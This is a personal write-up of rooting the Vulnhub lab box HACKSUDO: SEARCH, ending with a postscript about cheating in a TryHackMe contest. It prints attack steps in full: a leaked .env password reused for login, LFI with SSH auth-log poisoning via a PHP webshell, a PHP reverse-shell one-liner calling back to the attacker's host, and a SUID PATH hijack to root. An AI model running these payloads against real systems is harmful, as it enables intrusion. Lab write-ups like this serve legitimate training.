Vulnhub: HACKSUDO: SEARCH
HACKSUDO: SEARCH
This is HACKSUDO: SEARCH from Vulnhub. It says:
This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b)
Ports
SSH and HTTP only.
Web
The basic dirsearch:
python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209
gives me a few things, including this:
[06:23:34] 200 - 306B - /.env
And in there are some creds and other stuff:
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
Note we didn’t have an open SQL port though. We need a bigger feroxbuster search:
feroxbuster -u http://192.168.1.209 -w /usr/share/seclists/Discovery/Web-Content/big.txt -C 403 -x php,txt
to find this:
200 137l 288w 2918c http://192.168.1.209/search1.php
Which is what we want. Here, we find this hilarious link:
http://192.168.1.209/search1.php?FUZZ=contact.php
Along with the comment:
find me @hacksudo.com/contact @fuzzing always best option
Well, we better do what the man says. I use Burp Suite Turbo Intruder with /usr/share/seclists/Discovery/Web-Content/common.txt, and find the parameter we want is me
LFI
So we have LFI at http://192.168.1.209/search1.php?me=/etc/passwd
A bit of enumeration reveals we cannot read the apache logs, but we can read /var/log/auth.log so we poison SSH:
┌──(root💀kali)-[/opt/vulnhub/hacksudo_search]
└─# ssh '<?php system($_GET['cmd']); ?>'@192.168.1.209 And then I think I used the PHP one liner for a shell. I tried a few before one worked; I think this one did:
/search1.php?me=/var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.208",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
Privesc
Remember that password from before? Yeah.
www-data@HacksudoSearch:/home$ ls -lash
ls -lash
total 24K
4.0K drwxr-xr-x 6 root root 4.0K Apr 15 02:50 .
4.0K drwxr-xr-x 18 root root 4.0K Apr 11 07:31 ..
4.0K drwxr-x--- 6 hacksudo hacksudo 4.0K Apr 15 03:14 hacksudo
4.0K drwxr-x--- 2 john john 4.0K Apr 13 03:21 john
4.0K drwxr-x--- 2 monali monali 4.0K Apr 13 03:21 monali
4.0K drwxr-x--- 2 search search 4.0K Apr 15 02:50 search
www-data@HacksudoSearch:/home$ su search
Password: MyD4dSuperH3r0!
su: Authentication failure
www-data@HacksudoSearch:/home$ su john
Password: MyD4dSuperH3r0!
su: Authentication failure
www-data@HacksudoSearch:/home$ su monali
Password: MyD4dSuperH3r0! su: Authentication failure
www-data@HacksudoSearch:/home$ su hacksudo
Password: MyD4dSuperH3r0!
hacksudo@HacksudoSearch:/home$ cd hacksudo
hacksudo@HacksudoSearch:~$ sudo -l
sudo -l
bash: sudo: command not foundI knew we’d get there eventually. Now what?
hacksudo@HacksudoSearch:~/search/tools$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 2 hacksudo hacksudo 4.0K Apr 15 02:57 .
4.0K drwxr-xr-x 4 hacksudo hacksudo 4.0K Apr 14 03:50 ..
0 -rw-r--r-- 1 hacksudo hacksudo 0 Apr 15 02:57 file
20K ---Sr-xr-x 1 root root 17K Apr 14 03:36 searchinstall
4.0K -rw-r--r-- 1 hacksudo hacksudo 78 Apr 14 03:34 searchinstall.c
hacksudo@HacksudoSearch:~/search/tools$ file sear
file searchinstall
searchinstall: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=36393d16c6d4da7804ed34057edeb73d7ebf0b08, not stripped
hacksudo@HacksudoSearch:~/search/tools$ cat searchinstall.c
cat searchinstall.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("install");
}
hacksudo@HacksudoSearch:~/search/tools$ echo sh > install
echo sh > install
hacksudo@HacksudoSearch:~/search/tools$ chmod +x install
chmod +x install
hacksudo@HacksudoSearch:~/search/tools$ export PATH=.:$PATH
export PATH=.:$PATH
hacksudo@HacksudoSearch:~/search/tools$ ./searchinstall
./searchinstall
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(hacksudo)
HacksudoSearch
Mon 26 Apr 2021 07:01:30 AM EDT
# cat /root/root.txt
cat /root/root.txt
# snip ascii art
You Successfully Hackudo search box
rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}So it’s an SUID binary, calling ‘install’ without a path. Create our own, export PATH and call the binary; no problem.
Postscript
I’ve been banging up against Year of the Jellyfish at THM and I just want to say a few words about it. It’s described thus:
This box is part of an OSCP voucher giveaway (prize kindly donated by @q8fawazo)! Root the box before 6PM UTC on the 30th of April 2021 to be entered into the prize draw. The winner will be chosen by raffle at that time, streamed and announced in the TryHackMe Discord server, so please make sure to join and verify if you wish to be entered in the competition. If you do not want to be entered, or are ineligible to use the voucher (under 18 years old, or already OSCP certified / have access to the PEN-200 (PWK) Materials), please ping @MuirlandOracle in the help channel for this room on the Discord to discuss this. There are also 5 One Month TryHackMe Subscription Vouchers to be given away in the same fashion (courtesy of @Virtual_Lad)
It goes without saying that any signs of cheating will result in an immediate and permanent ban – both from the competition and from the site/community.
I’ve got a shell and the first of two flags, but I haven’t rooted it (yet). I don’t consider myself ready for OSCP and I don’t want the voucher, but it’s a tasty challenge to try to complete anyway.
But I’ve been following the conversation in the discord about it, and apparently people are now cheating, so someone has figured it out and has told others how to do it. Foothold is easy once you’ve figured out how, but I don’t know what root is although I gather it’s unusual; I haven’t been able to figure it out yet. But let’s say you cheat and:
- get away with it, and
- win the voucher
Now what? Surely if you have to cheat to solve this thing then OSCP will crush you. And if you’re so lazy that you’ve got the skills to solve the challenge but can’t be bothered, WTF? I honestly don’t understand. Anyway I got sick of it so I went and did this Vulnhub box instead.